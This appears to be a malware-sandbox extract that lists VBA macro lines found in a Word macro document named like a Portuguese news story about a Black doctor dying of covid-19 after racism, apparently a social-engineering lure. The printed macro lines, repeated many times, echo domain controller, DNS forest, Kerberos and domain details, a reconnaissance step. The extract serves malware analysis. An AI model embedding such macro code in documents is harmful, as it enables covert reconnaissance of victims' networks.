Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Primary Domain Controller Flag: " & objItem.DSPrimaryDomainControllerFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Time Service Flag: " & objItem.DSTimeServiceFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Writable Flag: " & objItem.DSWritableFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Name: " & objItem.Name
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Primary Owner Contact: " & objItem.PrimaryOwnerContact
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DC: " & objItem.DC
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Default: " & objItem.Default
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain: " & objItem.Domain
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Key Name: " & objItem.KeyName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Maps: " & objItem.Maps
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Client Site Name: " & objItem.ClientSiteName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DC Site Name: " & objItem.DcSiteName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Description: " & objItem.Description
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DNS Forest Name: " & objItem.DnsForestName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain Controller Address: " & objItem.DomainControllerAddress
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain Controller Address Type: " & objItem.DomainControllerAddressType
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain Controller Name: " & objItem.DomainControllerName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain GUID: " & objItem.DomainGuid
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain Name: " & objItem.DomainName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Directory Service Flag: " & objItem.DSDirectoryServiceFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS DNS Controller Flag: " & objItem.DSDnsControllerFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS DNS Domain Flag: " & objItem.DSDnsDomainFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS DNS Forest Flag: " & objItem.DSDnsForestFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Global Catalog Flag: " & objItem.DSGlobalCatalogFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Kerberos Distribution Center Flag: " & objItem.DSKerberosDistributionCenterFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Primary Domain Controller Flag: " & objItem.DSPrimaryDomainControllerFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Time Service Flag: " & objItem.DSTimeServiceFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Writable Flag: " & objItem.DSWritableFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Name: " & objItem.Name
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Primary Owner Contact: " & objItem.PrimaryOwnerContact
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DC: " & objItem.DC
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Default: " & objItem.Default
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain: " & objItem.Domain
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Key Name: " & objItem.KeyName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Maps: " & objItem.Maps
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Client Site Name: " & objItem.ClientSiteName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DC Site Name: " & objItem.DcSiteName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Description: " & objItem.Description
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DNS Forest Name: " & objItem.DnsForestName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain Controller Address: " & objItem.DomainControllerAddress
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain Controller Address Type: " & objItem.DomainControllerAddressType
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain Controller Name: " & objItem.DomainControllerName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain GUID: " & objItem.DomainGuid
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain Name: " & objItem.DomainName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Directory Service Flag: " & objItem.DSDirectoryServiceFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS DNS Controller Flag: " & objItem.DSDnsControllerFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS DNS Domain Flag: " & objItem.DSDnsDomainFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS DNS Forest Flag: " & objItem.DSDnsForestFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Global Catalog Flag: " & objItem.DSGlobalCatalogFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Kerberos Distribution Center Flag: " & objItem.DSKerberosDistributionCenterFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Primary Domain Controller Flag: " & objItem.DSPrimaryDomainControllerFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Time Service Flag: " & objItem.DSTimeServiceFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Writable Flag: " & objItem.DSWritableFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Name: " & objItem.Name
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Primary Owner Contact: " & objItem.PrimaryOwnerContact
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DC: " & objItem.DC
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Default: " & objItem.Default
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain: " & objItem.Domain
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Key Name: " & objItem.KeyName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Maps: " & objItem.Maps
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Client Site Name: " & objItem.ClientSiteName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DC Site Name: " & objItem.DcSiteName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Description: " & objItem.Description
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DNS Forest Name: " & objItem.DnsForestName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain Controller Address: " & objItem.DomainControllerAddress
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain Controller Address Type: " & objItem.DomainControllerAddressType
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain Controller Name: " & objItem.DomainControllerName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain GUID: " & objItem.DomainGuid
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain Name: " & objItem.DomainName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Directory Service Flag: " & objItem.DSDirectoryServiceFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS DNS Controller Flag: " & objItem.DSDnsControllerFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS DNS Domain Flag: " & objItem.DSDnsDomainFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS DNS Forest Flag: " & objItem.DSDnsForestFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Global Catalog Flag: " & objItem.DSGlobalCatalogFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Kerberos Distribution Center Flag: " & objItem.DSKerberosDistributionCenterFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Primary Domain Controller Flag: " & objItem.DSPrimaryDomainControllerFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Time Service Flag: " & objItem.DSTimeServiceFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Writable Flag: " & objItem.DSWritableFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Name: " & objItem.Name
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Primary Owner Contact: " & objItem.PrimaryOwnerContact
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DC: " & objItem.DC
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Default: " & objItem.Default
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain: " & objItem.Domain
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Key Name: " & objItem.KeyName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Maps: " & objItem.Maps
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Client Site Name: " & objItem.ClientSiteName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DC Site Name: " & objItem.DcSiteName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Description: " & objItem.Description
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DNS Forest Name: " & objItem.DnsForestName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain Controller Address: " & objItem.DomainControllerAddress
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain Controller Address Type: " & objItem.DomainControllerAddressType
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain Controller Name: " & objItem.DomainControllerName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain GUID: " & objItem.DomainGuid
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain Name: " & objItem.DomainName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Directory Service Flag: " & objItem.DSDirectoryServiceFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS DNS Controller Flag: " & objItem.DSDnsControllerFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS DNS Domain Flag: " & objItem.DSDnsDomainFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS DNS Forest Flag: " & objItem.DSDnsForestFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Global Catalog Flag: " & objItem.DSGlobalCatalogFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Kerberos Distribution Center Flag: " & objItem.DSKerberosDistributionCenterFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Primary Domain Controller Flag: " & objItem.DSPrimaryDomainControllerFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Time Service Flag: " & objItem.DSTimeServiceFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Writable Flag: " & objItem.DSWritableFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Name: " & objItem.Name
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Primary Owner Contact: " & objItem.PrimaryOwnerContact
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DC: " & objItem.DC
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Default: " & objItem.Default
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain: " & objItem.Domain
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Key Name: " & objItem.KeyName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Maps: " & objItem.Maps
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Client Site Name: " & objItem.ClientSiteName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DC Site Name: " & objItem.DcSiteName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Description: " & objItem.Description
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DNS Forest Name: " & objItem.DnsForestName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain Controller Address: " & objItem.DomainControllerAddress
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain Controller Address Type: " & objItem.DomainControllerAddressType
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain Controller Name: " & objItem.DomainControllerName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain GUID: " & objItem.DomainGuid
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain Name: " & objItem.DomainName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Directory Service Flag: " & objItem.DSDirectoryServiceFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS DNS Controller Flag: " & objItem.DSDnsControllerFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS DNS Domain Flag: " & objItem.DSDnsDomainFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS DNS Forest Flag: " & objItem.DSDnsForestFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Global Catalog Flag: " & objItem.DSGlobalCatalogFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Kerberos Distribution Center Flag: " & objItem.DSKerberosDistributionCenterFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Primary Domain Controller Flag: " & objItem.DSPrimaryDomainControllerFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Time Service Flag: " & objItem.DSTimeServiceFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Writable Flag: " & objItem.DSWritableFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Name: " & objItem.Name
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Primary Owner Contact: " & objItem.PrimaryOwnerContact
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DC: " & objItem.DC
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Default: " & objItem.Default
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain: " & objItem.Domain
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Key Name: " & objItem.KeyName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Maps: " & objItem.Maps
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Client Site Name: " & objItem.ClientSiteName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DC Site Name: " & objItem.DcSiteName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Description: " & objItem.Description
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DNS Forest Name: " & objItem.DnsForestName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain Controller Address: " & objItem.DomainControllerAddress
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain Controller Address Type: " & objItem.DomainControllerAddressType
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain Controller Name: " & objItem.DomainControllerName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain GUID: " & objItem.DomainGuid
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain Name: " & objItem.DomainName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Directory Service Flag: " & objItem.DSDirectoryServiceFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS DNS Controller Flag: " & objItem.DSDnsControllerFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS DNS Domain Flag: " & objItem.DSDnsDomainFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS DNS Forest Flag: " & objItem.DSDnsForestFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Global Catalog Flag: " & objItem.DSGlobalCatalogFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Kerberos Distribution Center Flag: " & objItem.DSKerberosDistributionCenterFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Primary Domain Controller Flag: " & objItem.DSPrimaryDomainControllerFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Time Service Flag: " & objItem.DSTimeServiceFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Writable Flag: " & objItem.DSWritableFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Name: " & objItem.Name
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Primary Owner Contact: " & objItem.PrimaryOwnerContact
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DC: " & objItem.DC
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Default: " & objItem.Default
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain: " & objItem.Domain
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Key Name: " & objItem.KeyName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Maps: " & objItem.Maps
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Client Site Name: " & objItem.ClientSiteName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DC Site Name: " & objItem.DcSiteName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Description: " & objItem.Description
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DNS Forest Name: " & objItem.DnsForestName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain Controller Address: " & objItem.DomainControllerAddress
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain Controller Address Type: " & objItem.DomainControllerAddressType
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain Controller Name: " & objItem.DomainControllerName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain GUID: " & objItem.DomainGuid
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain Name: " & objItem.DomainName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Directory Service Flag: " & objItem.DSDirectoryServiceFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS DNS Controller Flag: " & objItem.DSDnsControllerFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS DNS Domain Flag: " & objItem.DSDnsDomainFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS DNS Forest Flag: " & objItem.DSDnsForestFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Global Catalog Flag: " & objItem.DSGlobalCatalogFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Kerberos Distribution Center Flag: " & objItem.DSKerberosDistributionCenterFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Primary Domain Controller Flag: " & objItem.DSPrimaryDomainControllerFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Time Service Flag: " & objItem.DSTimeServiceFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Writable Flag: " & objItem.DSWritableFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Name: " & objItem.Name
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Primary Owner Contact: " & objItem.PrimaryOwnerContact
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DC: " & objItem.DC
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Default: " & objItem.Default
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain: " & objItem.Domain
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Key Name: " & objItem.KeyName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Maps: " & objItem.Maps
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Client Site Name: " & objItem.ClientSiteName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DC Site Name: " & objItem.DcSiteName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Description: " & objItem.Description
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DNS Forest Name: " & objItem.DnsForestName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain Controller Address: " & objItem.DomainControllerAddress
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain Controller Address Type: " & objItem.DomainControllerAddressType
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain Controller Name: " & objItem.DomainControllerName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain GUID: " & objItem.DomainGuid
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain Name: " & objItem.DomainName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Directory Service Flag: " & objItem.DSDirectoryServiceFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS DNS Controller Flag: " & objItem.DSDnsControllerFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS DNS Domain Flag: " & objItem.DSDnsDomainFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS DNS Forest Flag: " & objItem.DSDnsForestFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Global Catalog Flag: " & objItem.DSGlobalCatalogFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Kerberos Distribution Center Flag: " & objItem.DSKerberosDistributionCenterFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Primary Domain Controller Flag: " & objItem.DSPrimaryDomainControllerFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Time Service Flag: " & objItem.DSTimeServiceFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Writable Flag: " & objItem.DSWritableFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Name: " & objItem.Name
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Primary Owner Contact: " & objItem.PrimaryOwnerContact
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DC: " & objItem.DC
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Default: " & objItem.Default
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain: " & objItem.Domain
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Key Name: " & objItem.KeyName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Maps: " & objItem.Maps
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Client Site Name: " & objItem.ClientSiteName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DC Site Name: " & objItem.DcSiteName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Description: " & objItem.Description
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DNS Forest Name: " & objItem.DnsForestName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain Controller Address: " & objItem.DomainControllerAddress
